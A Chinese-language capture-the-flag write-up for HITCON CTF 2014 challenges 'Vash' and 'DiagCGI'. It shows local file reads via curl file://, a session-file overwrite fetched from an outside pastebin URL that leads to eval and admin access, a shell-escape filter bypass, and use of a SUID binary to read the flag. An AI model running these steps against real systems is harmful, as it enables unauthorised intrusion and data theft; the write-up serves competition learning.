HITCON-CTF-2014-Vash/DiagCGI-Writeup

Vash[Trivia 10]

说明:

Find out the flag. It should be there, you know.
nc 203.66.57.167 31337

Hint:
Most (but not all) challenge's environment is same as this one.

nc连接

nc -nvv 203.66.57.167 31337

列出/home/目录下/vash/账户目录中存放有flag

HITCON{Welcome to HITCON CTF 2014!!}

DIAGCGI[WEB 68]

说明:

http://54.92.127.128:16888/

访问网页有三个功能

ping
traceroute
curl

网页源码隐藏有shell功能

借助curl支持读取本地文件

curl file:///etc/passwd

curl file://dana-na.cgi

得到脚本文件源码

网站首先判断Cookie是否存在,若不存在就创建SESSION文件

if (! defined($sessfile) )
{
    if ( md5_hex($cgi->param("sechash")) =~ /^000000000000.*$/)
    {
        $sesshash{'user'} = 'admin';
    }
    else
    {
        $sesshash{'user'}  = 'guest';
    }
    $sesshash{'ip'} = &get_ip;

    $diagsess = md5_hex( $sesshash{'user'} . '|||' . $sesshash{'ip'} );
    $cookie = "diagsess=$diagsess;";
    &write_session;
    print $cgi->header(-cookie => $cookie,
            -expires => 'Mon, 01 Jan 1999 00:00:00 GMT',
            -'cache-control' => 'no-cache',
            -pragma => 'no-cache',-'location'=> 'dana-na.cgi?sechash=' );

    exit 0;

否则就读取Session

else
{
    print $cgi->header();
    &read_session;
    &print_menu;
}

注意这里session文件我们是可控的,(文件名是我们的Cookie),Session文件存放于/tmp/目录中

在执行隐藏的shell命令时,会经过这个函数

sub shell
{
    $cmd = shift;
    print "<pre>";
    if (  $sesshash{'user'} eq 'admin' ) 
    {
        open(GG, "$cmd |") and do
        {
            print;
        };
    }
    else
    {
        print "sorry $sesshash{'user'}! you're not admin!\n";

    }
}

会判断$sesshash{'user'}是否等于admin

$sesshash{'user'}的来源在这里

sub read_session
{
    undef %sesshash;
    if(! -f "$SESSDIR/$sessfile")
    {
        print "session error!";
        return;
    }
    open(GG, "$SESSDIR/$sessfile") and do {
        while (<GG>) {
            eval($_);
        }
        close GG;
    };
}

从Cookie文件中读取得到

系统自动生成的Cookie是这样子:

$sesshash{'ip'} = '8.8.8.8';
$sesshash{'user'} = 'guest';

修改Cookie成这样子:

$sesshash{'ip'} = '8.8.8.8';
$sesshash{'user'} = 'admin';

修改借助curl实现,curl命令有参数-o可以创建文件,故使用

curl -o /tmp/{SESSION文件名,也就是我们的Cookie值} http://pastebin.com/raw.php?i=u5Spm5ZT

篡改SESSION文件,至此可以执行命令,但是执行命令缺少

while (<GG>) { }

不会有print回显,必须导出到文件看结果,而传入的所有参数又会经过以下代码:

sub safestr
{
    my $str = shift;

    $str =~  s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;;
    return $str;

}

过滤,测试发现

/bin/cat /etc/passwd > /tmp/123 &action=shell

会转义成

/bin/cat /etc/passwd \> /tmp/123 &action=shell

用这样的语句绕过

/bin/cat /etc/passwd \\> /tmp/123 &action=shell

可以执行命令

/bin/ls -la / \\> /tmp/123 &action=shell

列出所有文件

-r--------   1 key  www-data     41 Jul 28 08:37 key.txt
drwxr-xr-x  21 root root       4096 Jul 28 08:35 lib
drwxr-xr-x   2 root root       4096 Aug 13 16:29 lib64
drwx------   2 root root      16384 Jun  7 10:51 lost+found
drwxr-xr-x   2 root root       4096 Jun  7 10:49 media
drwxr-xr-x   2 root root       4096 Apr 10 22:12 mnt
drwxr-xr-x   2 root root       4096 Jun  7 10:49 opt
dr-xr-xr-x 235 root root          0 Aug 13 16:29 proc
-r-sr-x---   1 key  www-data 877753 Jul 28 08:39 read_key

SUID文件读取Flag

/read_key /key.txt \> /tmp/oops &action=shell

@Le4F ::TEAM L::